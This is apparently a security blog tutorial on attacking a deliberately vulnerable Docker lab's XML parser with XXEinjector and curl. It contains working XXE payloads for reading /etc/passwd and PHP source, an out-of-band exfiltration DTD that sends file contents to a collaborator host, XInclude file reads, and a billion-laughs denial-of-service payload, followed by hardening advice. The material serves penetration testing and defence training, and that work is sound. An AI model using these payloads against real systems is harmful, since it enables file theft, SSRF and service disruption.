XXEinjector Tutorial: Exploit a Vulnerable XML Parser

This is the walkthrough I wish I had when I first reached for XXEinjector. We start from a fresh state, point the Ruby tool at a vulnerable XML endpoint, and walk every primitive the tool exposes: in-band file read, PHP filter source disclosure, blind out-of-band exfil, plus the manual XInclude and billion-laughs payloads that sit outside XXEinjector's wheelhouse but belong in the same article. Every step is reproducible against a small Docker lab I publish for this exact purpose.

If you have not read the XML External Entity deep dive yet, do that first; this article assumes the parser flags and the entity grammar are familiar. The XXEinjector cheat sheet is the flag-by-flag reference that complements this walkthrough, and the best XXE tools list for 2026 covers where XXEinjector sits relative to manual curl and the Burp extensions.

A note on the output you will see. Every example below was produced against techearl-labs/xml-external-entity/xxe-basic on the pinned PHP 8.2 + libxml 2.9.14 image. The endpoints, parser configuration, and the failure modes are deterministic and will match what you get locally. A few outputs are environment-dependent and will differ in minor ways: the IP address the collaborator logs for the lab container (a Docker bridge address, e.g. 172.27.0.3), the exact /etc/passwd contents inside the PHP container (whatever the base image ships), XXEinjector's own log timestamps, and the path it writes the captured loot to under Logs/. Those values are illustrative; the structure underneath is what to follow.

The lab target

Pull and run the lab:

```bash
git clone https://github.com/ishankaru/techearl-labs.git
cd techearl-labs
docker compose up xxe-basic
```

The target listens on http://localhost:8086. There are two endpoints, both backed by the same unsafe parser (LIBXML_NOENT | LIBXML_DTDLOAD | LIBXML_NOCDATA, plus an explicit $dom->xinclude() call):

| Endpoint | Method | Behaviour |
| --- | --- | --- |
| `/import.php` | POST | Parses the XML body, echoes every `<name>` element back into the HTML response. In-band XXE, XInclude, and the billion-laughs mitigation all live here. |
| `/upload-blind.php` | POST | Same parser, response hard-wired to `OK` or `Error`. No content reflects back. This is the realistic shape of a backend XML processor. |

A second container, xxe-basic-collab, runs a tiny Python HTTP server on the Docker network. It has no published port (only the sibling lab container can reach it) and logs every incoming request line to stdout. Tail it in a second terminal before starting:

```bash
docker compose logs -f xxe-basic-collab
```

That log is the side channel for every blind exfil attempt in this article. If you do not see lines appear there, the attack did not fire.

Step 1: install XXEinjector

XXEinjector is a single Ruby script. Either clone the repo or grab the file:

```bash
git clone https://github.com/enjoiz/XXEinjector.git
cd XXEinjector
ruby XXEinjector.rb --help
```

The tool needs a recent Ruby (2.7+ is fine, anything in the 3.x range works). If --help prints, you are done. No gems, no virtualenv.

Step 2: build the request template

XXEinjector works from a captured HTTP request with an XXEINJECT marker where it should splice each payload. Save the file as req.txt:

```http
POST /import.php HTTP/1.1
Host: localhost:8086
Content-Type: application/xml
Content-Length: 0

XXEINJECT
```

Content-Length: 0 is fine; XXEinjector recalculates it for every request before sending. The marker has to be on its own line, in the body, exactly XXEINJECT. No surrounding XML scaffolding (the tool builds that for you).
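The splice-and-recount behaviour described above can be sketched in a few lines of Python. This is a minimal illustration of the idea, not XXEinjector's own code (the tool is Ruby); the function name `splice` and the CRLF normalisation are assumptions made for the example.

```python
MARKER = "XXEINJECT"


def splice(template: str, payload: str) -> bytes:
    """Replace the marker in the body and recompute Content-Length."""
    # Split the headers from the body at the first blank line.
    head, _, body = template.replace("\r\n", "\n").partition("\n\n")
    if MARKER not in body:
        raise ValueError("marker must appear in the request body")
    body_bytes = body.replace(MARKER, payload).strip("\n").encode("utf-8")
    # Drop the placeholder Content-Length and append the real one.
    headers = [
        line for line in head.split("\n")
        if not line.lower().startswith("content-length:")
    ]
    headers.append(f"Content-Length: {len(body_bytes)}")
    return "\r\n".join(headers).encode("utf-8") + b"\r\n\r\n" + body_bytes
```

Calling `splice(open("req.txt").read(), "<foo>x</foo>")` would yield a request whose Content-Length matches the spliced body rather than the placeholder 0.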

For the blind endpoint you build a second template, identical apart from the path:

```http
POST /upload-blind.php HTTP/1.1
Host: localhost:8086
Content-Type: application/xml
Content-Length: 0

XXEINJECT
```

Save that as req-blind.txt. Both files sit next to where you run the tool.

Step 3: classic in-band file read

The in-band primitive is the one XXEinjector was originally written for: declare an external entity, reference it where the application echoes content back, and let the response do the exfil. The lab's /import.php is exactly that shape.

```bash
ruby XXEinjector.rb \
  --host=127.0.0.1 \
  --file=req.txt \
  --path=/etc/passwd \
  --direct=YES \
  --verbose
```

What each flag does:

--host=127.0.0.1 is the address of the attacker's listener. We are not using the listener for this scenario (this is in-band), but XXEinjector requires the flag.
--file=req.txt is the request template from Step 2.
--path=/etc/passwd is the file on the target's filesystem to read.
--direct=YES tells the tool to use a direct entity reference (<!ENTITY xxe SYSTEM "file://...">) rather than the parameter-entity OOB chain (covered in Step 6, and broken on this libxml).
--verbose prints the payload it sends and the response it gets, which is the only way to learn how the tool reasons.

Output (abbreviated):

```text
[+] Sending request with malicious XML:
<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>

[+] Got response. Looking for file in response...
[+] File found:
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
[+] Saved to: Logs/127.0.0.1/_etc_passwd
```

XXEinjector finds the echoed bytes in the response body, slices them out, writes them to Logs/<host>/<sanitised-path>, and prints them inline when --verbose is on. The file is on your disk now.

A useful sanity check before troubleshooting: confirm the lab echoes <name> content by hand:

```bash
curl -s -X POST --data-binary @- \
  -H 'Content-Type: application/xml' \
  http://localhost:8086/import.php <<'XML'
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>
<bookmarks>
  <bookmark><name>&xxe;</name><url>http://x</url></bookmark>
</bookmarks>
XML
```

If the response contains the container's hostname inside a <strong>, the in-band primitive works and XXEinjector should succeed. If it does not, fix the manual case before re-running the tool.
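If you would rather check the reflection programmatically than by eye, a small helper along these lines would do. It is a sketch that assumes the lab wraps each echoed name in `<strong>...</strong>` as described above; the helper name and the sample HTML in the usage note are hypothetical.

```python
import html
import re


def echoed_names(response_html: str) -> list[str]:
    """Return the text of every <strong> element in the response body."""
    matches = re.findall(r"<strong>(.*?)</strong>", response_html, flags=re.S)
    # Undo HTML escaping so file contents come back byte-for-byte.
    return [html.unescape(m) for m in matches]
```

For a response such as `<li><strong>a1b2c3</strong> http://x</li>`, the helper returns `["a1b2c3"]`; an empty list means nothing was reflected and the manual case needs fixing first.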

Step 4: PHP filter source disclosure

file:// hands libxml the raw bytes of the file. That is fine for plain-text files, but PHP source rarely reaches you intact. PHP never executes on this path; the problem is that libxml parses the entity's replacement text as XML content. A <?php ... ?> block is read as a processing instruction and dropped from the echoed text, and a file with no closing ?> or with stray < and & outside it aborts the parse. The classic trick is to wrap the path in php://filter/convert.base64-encode/, which routes the read through PHP's stream filter machinery and hands the parser a base64 string, which contains no XML metacharacters and so survives as plain character data.

XXEinjector has a built-in shortcut for exactly this:

```bash
ruby XXEinjector.rb \
  --host=127.0.0.1 \
  --file=req.txt \
  --path=/var/www/html/import.php \
  --direct=YES \
  --phpfilter \
  --verbose
```

--phpfilter rewrites the entity URL from file:///var/www/html/import.php to php://filter/convert.base64-encode/resource=/var/www/html/import.php. The lab echoes the base64 blob back inside a <strong> tag, XXEinjector grabs it, decodes, and writes the actual PHP source.

Output (abbreviated):

```text
[+] Sending request with malicious XML:
<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM
  "php://filter/convert.base64-encode/resource=/var/www/html/import.php">]>
<foo>&xxe;</foo>

[+] Got response. Looking for file in response...
[+] Base64-decoded and saved to: Logs/127.0.0.1/_var_www_html_import.php
```
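The URL rewrite and the decode step are simple enough to reproduce by hand when you are driving the payload with curl instead of the tool. The sketch below shows both halves; the function names are made up for the example, and the whitespace stripping is an assumption about how a reflected blob might get wrapped in HTML.

```python
import base64


def php_filter_url(path: str) -> str:
    """Wrap a filesystem path in PHP's base64 stream filter."""
    return f"php://filter/convert.base64-encode/resource={path}"


def decode_blob(blob: str) -> bytes:
    """Decode a reflected base64 blob back into the original file bytes."""
    # Remove any whitespace the HTML response may have introduced.
    return base64.b64decode("".join(blob.split()))
```

Feed `php_filter_url("/var/www/html/import.php")` into the SYSTEM identifier, copy the reflected blob out of the response, and pass it to `decode_blob` to recover the source.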

cat the file and you get the PHP source of the endpoint you just exploited. In a real engagement this is where you walk the codebase off the box looking for credentials, config files, second-order vulnerabilities, and any other entrypoints the same parser handles. The shortlist is application-specific: wp-config.php, .env, framework bootstrap files, anything in the application's config/ directory.

Step 5: blind out-of-band exfil with a direct external entity

/upload-blind.php returns OK either way, so the in-band approach above will never work there. The realistic primitive is to make libxml issue an outbound HTTP request when it resolves an entity, encode the bit you care about into the URL, and read it out of the collaborator log.

XXEinjector has a built-in HTTP listener (--oob=http) but the only port the lab container can reach is the collaborator's port 80 inside the Docker network. Easier to use what is already there:

```bash
ruby XXEinjector.rb \
  --host=xxe-basic-collab \
  --file=req-blind.txt \
  --oob=http \
  --direct=YES \
  --path=/etc/hostname \
  --verbose
```

--host=xxe-basic-collab tells XXEinjector to point the SYSTEM URL at the collaborator hostname (which the lab container resolves over the Docker bridge). --oob=http selects the HTTP OOB mode, --direct=YES keeps the entity declaration inline rather than chaining through an external DTD.

In practice, since we are not letting XXEinjector be its own listener, the cleanest demo is to drive the payload manually with curl and watch the collaborator log. XXEinjector's value here is that the same shape generalises across hosts:

```bash
curl -s -X POST --data-binary @- \
  -H 'Content-Type: application/xml' \
  http://localhost:8086/upload-blind.php <<'XML'
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY exfil SYSTEM "http://xxe-basic-collab/?leak=fired">
]>
<bookmarks>
  <bookmark><name>&exfil;</name><url>http://x</url></bookmark>
</bookmarks>
XML
```

Response from the lab: OK. Response in the collaborator tail:

```text
[collab] GET from 172.27.0.3 path=/?leak=fired
```

The OOB primitive fires. The endpoint reflected nothing, but the parser still made an outbound HTTP request when it resolved &exfil;, and the collaborator received it. Anything you can put into that query string (a static token, a per-victim id, a hostname) lands in the log.
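If you need the same side channel outside the lab, a collaborator of this kind is only a few lines of standard-library Python. The sketch below is not the lab's actual server; it is an assumed equivalent that reproduces the log format shown above, and the names `Collab`, `log_line`, and `serve` are invented for the example.

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


def log_line(client_ip: str, path: str) -> str:
    """Format one request the way the collaborator log above shows it."""
    return f"[collab] GET from {client_ip} path={path}"


class Collab(BaseHTTPRequestHandler):
    def do_GET(self):
        # The query string is the exfil channel, so log the full path.
        print(log_line(self.client_address[0], self.path), flush=True)
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):
        # Silence the default access log; log_line is the only output.
        pass


def serve(host: str = "0.0.0.0", port: int = 80) -> HTTPServer:
    """Start the listener in a background thread and return the server."""
    server = HTTPServer((host, port), Collab)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

Run `serve()` on a host the target can reach and point the SYSTEM URL at it; binding port 80 usually needs elevated privileges, so pass a higher port when testing locally.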

Step 6: why the textbook recursive-PE chain fails here

Every classic XXE write-up demonstrates blind file-content exfil with a recursive parameter-entity chain in an external DTD. XXEinjector implements exactly this pattern when you drop --direct=YES and let it host its own evil.dtd:

```bash
ruby XXEinjector.rb \
  --host=xxe-basic-collab \
  --file=req-blind.txt \
  --oob=http \
  --path=/etc/passwd \
  --verbose
```

The payload XXEinjector builds is shaped like:

```xml
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % remote SYSTEM "http://xxe-basic-collab/evil.dtd">
  %remote;
]>
<foo>x</foo>
```

evil.dtd declares a parameter entity %file that reads /etc/passwd, an %eval that defines %exfil whose SYSTEM URL embeds %file; in the query string, then forces %exfil; to resolve so the file contents leave in the outbound URL.
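For reference, the textbook form of that DTD can be generated as below. This is a sketch of the classic pattern, not the exact bytes XXEinjector serves; the function name and the `leak` query parameter are assumptions carried over from the Step 5 example.

```python
def build_evil_dtd(path: str, collab: str = "http://xxe-basic-collab") -> str:
    """Return the classic recursive parameter-entity exfil DTD."""
    # Stage 1: %file reads the target file.
    file_decl = '<!ENTITY % file SYSTEM "file://' + path + '">'
    # Stage 2: %eval defines %exfil. &#x25; is the character reference
    # for "%", needed because a literal "%" is not allowed there.
    eval_decl = (
        "<!ENTITY % eval \"<!ENTITY &#x25; exfil SYSTEM '"
        + collab + "/?leak=%file;'>\">"
    )
    # Stage 3: expanding %eval declares %exfil; expanding %exfil
    # triggers the outbound request that carries the file contents.
    return "\n".join([file_decl, eval_decl, "%eval;", "%exfil;"]) + "\n"
```

`print(build_evil_dtd("/etc/passwd"))` gives you a DTD you can host yourself when testing the chain by hand against a target.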

Against the lab's libxml 2.9.14 the chain does not fire end-to-end. What you will see in the collaborator log:

```text
[collab] GET from 172.27.0.3 path=/evil.dtd
```

One line. The external DTD loads. The second-stage %exfil; GET that should carry the file contents never appears. libxml has tightened parameter-entity processing across the 2.9.x series and now refuses to define a new entity inside the expansion of another entity loaded from an external DTD, which is the exact mechanic the recursive-PE pattern depends on. This is current 2026 behaviour on a stock PHP 8.2 image, not a quirk of one Docker tag.

What that means for XXEinjector specifically:

The OOB primitive in Step 5 still works. The parser does issue outbound requests for direct external entities.
The recursive-PE file-content exfil that XXEinjector defaults to does not work against this parser version. You will see the initial DTD fetch and nothing else.
The tool has no built-in fallback. It waits, decides nothing came back, and exits without loot.

This is not a bug in XXEinjector; it is libxml hardening eroding the technique the tool was designed around. On older parsers (anything before the 2.9.11-ish window where the PE restrictions tightened), and on differently-configured parsers (Java with XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES=true and no extra hardening, .NET pre-4.5.2, Python lxml with resolve_entities=True), the recursive-PE chain still works exactly the way XXEinjector expects. Test the chain manually against the target before assuming the tool is broken; if the initial DTD fetch hits your collaborator and nothing else does, you are looking at the same libxml ceiling. The blind XXE OOB techniques article walks the parser-by-parser matrix.

Step 7: XInclude (no DOCTYPE, no entity declaration)

XInclude is a separate libxml feature, opt-in, and entirely independent of entity processing. The lab calls $dom->xinclude() on the parsed document, which expands <xi:include> nodes in place. XXEinjector does not generate XInclude payloads (it is an entity-focused tool), so this step is manual curl:

```bash
curl -s -X POST --data-binary @- \
  -H 'Content-Type: application/xml' \
  http://localhost:8086/import.php <<'XML'
<?xml version="1.0"?>
<bookmarks xmlns:xi="http://www.w3.org/2001/XInclude">
  <bookmark>
    <name><xi:include href="file:///etc/hostname" parse="text"/></name>
    <url>http://x</url>
  </bookmark>
</bookmarks>
XML
```

The response includes the container's hostname inside the <strong> of the bookmark. No DOCTYPE, no <!ENTITY> declaration. The XInclude path is often missed by audits that only grep for inline DTDs, and disabling external entities does not disable XInclude. The XInclude attacks article covers the other half of the surface (recursive includes, intra-document includes that surface authentication cookies, the difference between parse="xml" and parse="text").
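Since XXEinjector will not build this payload for you, a small generator is handy when you want to try several target URIs. The sketch below uses Python's standard ElementTree and mirrors the bookmark structure from the curl example; the function name is hypothetical.

```python
import xml.etree.ElementTree as ET

XI_NS = "http://www.w3.org/2001/XInclude"


def xinclude_payload(target_uri: str) -> str:
    """Build a bookmarks document whose <name> pulls in target_uri."""
    # Serialise the XInclude namespace with the conventional xi: prefix.
    ET.register_namespace("xi", XI_NS)
    root = ET.Element("bookmarks")
    bookmark = ET.SubElement(root, "bookmark")
    name = ET.SubElement(bookmark, "name")
    # parse="text" includes the file as raw text instead of parsing it.
    ET.SubElement(name, f"{{{XI_NS}}}include",
                  {"href": target_uri, "parse": "text"})
    ET.SubElement(bookmark, "url").text = "http://x"
    return '<?xml version="1.0"?>\n' + ET.tostring(root, encoding="unicode")
```

The output contains no DOCTYPE at all, which is the point: a filter that only looks for inline DTDs passes it straight through.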

Step 8: billion laughs (the default mitigation in action)

The classic entity-expansion DoS, included here to show what the default libxml configuration actually catches. POST the nested payload at /import.php:

```bash
curl -s -X POST --data-binary @- \
  -H 'Content-Type: application/xml' \
  http://localhost:8086/import.php <<'XML'
<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
]>
<bookmarks>
  <bookmark><name>&lol6;</name><url>http://x</url></bookmark>
</bookmarks>
XML
```

Response: XML parse error with a libxml diagnostic about the entity-expansion limit. Container CPU and memory stay flat. The lab demonstrates the attack and the default mitigation that already blocks it: libxml refuses to expand the document past its built-in limit. Passing LIBXML_PARSEHUGE to loadXML would disable that limit; the lab does not pass it, which is also why a real-world audit should grep for LIBXML_PARSEHUGE and LIBXML_NOENT together. The billion laughs attack article covers the variants (quadratic blowup, external-entity-based amplification) that get around expansion counters which only look at internal entity references.
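The arithmetic behind the payload is worth making explicit. Each level references the previous one ten times, so the expanded size grows by a factor of ten per level. The helper below is a worked calculation only; its name and parameters are invented for the example.

```python
def expanded_length(base: str = "lol", fanout: int = 10, levels: int = 6) -> int:
    """Characters produced by fully expanding the deepest entity.

    levels counts every entity in the chain (lol, lol2, ... lol6 is 6).
    The first level is the literal string; each later level repeats the
    previous one fanout times.
    """
    return len(base) * fanout ** (levels - 1)
```

For the six-level payload above that comes to 3 x 10^5 = 300,000 characters from a document well under a kilobyte; four more levels would push it to 3 x 10^9, which is why the amplification ratio, not the absolute size, is what a parser has to police.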

Step 9: session and re-runs

XXEinjector writes everything it captures to Logs/<host>/. Re-running with the same --path overwrites the existing log entry; re-running with a different --path adds a new file. The tool has no session cache the way sqlmap does, so every run re-sends the full request, which is fine for XXE (a single round trip per file) but worth noting if you script bulk extraction across many paths.

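For bulk reads, XXEinjector's --brute=/path/to/wordlist flag loops over a file of target paths using the same payload shape. Useful when you have one entity primitive and you want to walk a known config-file list. --enumports is a different kind of loop: it probes which outbound ports the target can reach, which matters for the OOB modes rather than for file reads.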
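Because there is no session cache, scripting bulk extraction from outside the tool is just a loop of independent invocations. The sketch below builds the command line from the flags used in Step 3 and leaves execution to the caller; the helper names and the example path list are assumptions, and nothing here relies on flags beyond those already shown.

```python
import subprocess


def xxeinjector_argv(path: str, template: str = "req.txt",
                     host: str = "127.0.0.1") -> list[str]:
    """Command line for one in-band read, mirroring the Step 3 flags."""
    return [
        "ruby", "XXEinjector.rb",
        f"--host={host}",
        f"--file={template}",
        f"--path={path}",
        "--direct=YES",
    ]


def run_all(paths: list[str], runner=subprocess.run) -> None:
    """Run one full request per path; each run is independent."""
    for path in paths:
        # check=False: one failed read should not abort the whole walk.
        runner(xxeinjector_argv(path), check=False)
```

A call such as `run_all(["/etc/passwd", "/etc/hostname"])` from the XXEinjector directory would leave one file per path under Logs/.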

What I would do next on this target

In a real engagement, with Steps 3 through 8 done, the report writes itself:

Confirm in-band XXE on /import.php, multiple file-read primitives available (file://, php://filter).
Confirm PHP source disclosure via php://filter/convert.base64-encode/ on every file the application user can read.
Confirm blind OOB on /upload-blind.php via direct external entity (SSRF primitive: outbound HTTP from the application container to anywhere libxml can reach).
Confirm XInclude on /import.php as an alternative file-read path independent of entity hardening.
Note that the textbook recursive-PE file-content exfil does not fire against this parser version (libxml 2.9.14), but the OOB primitive remains.
Recommend: pass LIBXML_NONET (block network resolution) and never set LIBXML_NOENT, disable XInclude (do not call $dom->xinclude()), reject any XML body containing a DOCTYPE declaration at the application layer, run the XML processor with no outbound network access from its container.

The point of this walkthrough is the chain. Each primitive on its own looks small; the cumulative chain (file read, source disclosure, outbound SSRF, XInclude as the second-path file read) is what XXE means in practice for a real audit.

Where to go next

The XXEinjector cheat sheet for the full flag reference.
The XML External Entity deep dive for the parser-by-parser matrix and the defence playbook.
The blind XXE OOB techniques for the parser-version differences that decide whether the recursive-PE chain fires.
The XInclude attacks for the independent attack surface that hardening external entities does not close.
The billion laughs attack for the entity-expansion DoS variants.
The best XXE tools list for 2026 for where XXEinjector sits relative to manual curl, Burp's XXE extension, and the newer scanners.

Does XXEinjector still work in 2026?

For the in-band primitive (direct external entity, response reflects the content), yes, on any parser configured the way the lab is. For the blind out-of-band recursive parameter-entity chain that the tool defaults to, it depends entirely on the parser version. Current libxml (the parser PHP and many Linux distros ship) refuses the second-stage entity definition the chain relies on, so the chain fires the first DTD fetch and stops. Older parsers, and parsers in other ecosystems with permissive defaults, still work the textbook way. Test the chain by hand with curl plus a collaborator before assuming the tool is broken.

Why does the tool need a request file when XML attacks are stateless?

XXEinjector splices the payload into a captured HTTP request so the cookies, custom headers, content type, and target path are preserved verbatim. Real XML endpoints sit behind auth, CSRF tokens, tenant routing, and content negotiation; rebuilding all of that from command-line flags is fragile. The request template makes the tool work against arbitrary endpoints without per-target plumbing. The XXEINJECT marker is the only thing the tool has to know about the body.

What is the difference between the in-band and blind primitives, in practice?

In-band means the application echoes parsed content back into its own HTTP response, so the entity body lands in the response you can read. Blind means the response is fixed (OK or Error) and the data has to leave the parser through a side channel, which in XXE almost always means an outbound HTTP or FTP request to a server you control. The collaborator log is the side channel. In-band is faster; blind is more realistic for backend XML processors that accept a document and return a status code.

Can I exploit XXE with no outbound network from the target?

Sometimes. If the application echoes parsed content (in-band), you do not need outbound network at all; the response carries the data. If the application does not echo (blind), and the parser also cannot make outbound requests, the residual attack surface is local-only: error-message exfil if the parser surfaces libxml errors verbatim, denial of service via entity expansion (if not capped), and XInclude file read (if enabled and the included content reaches a response anywhere). A fully sandboxed parser with no echo and no XInclude is genuinely close to safe.

Ishan Karunaratne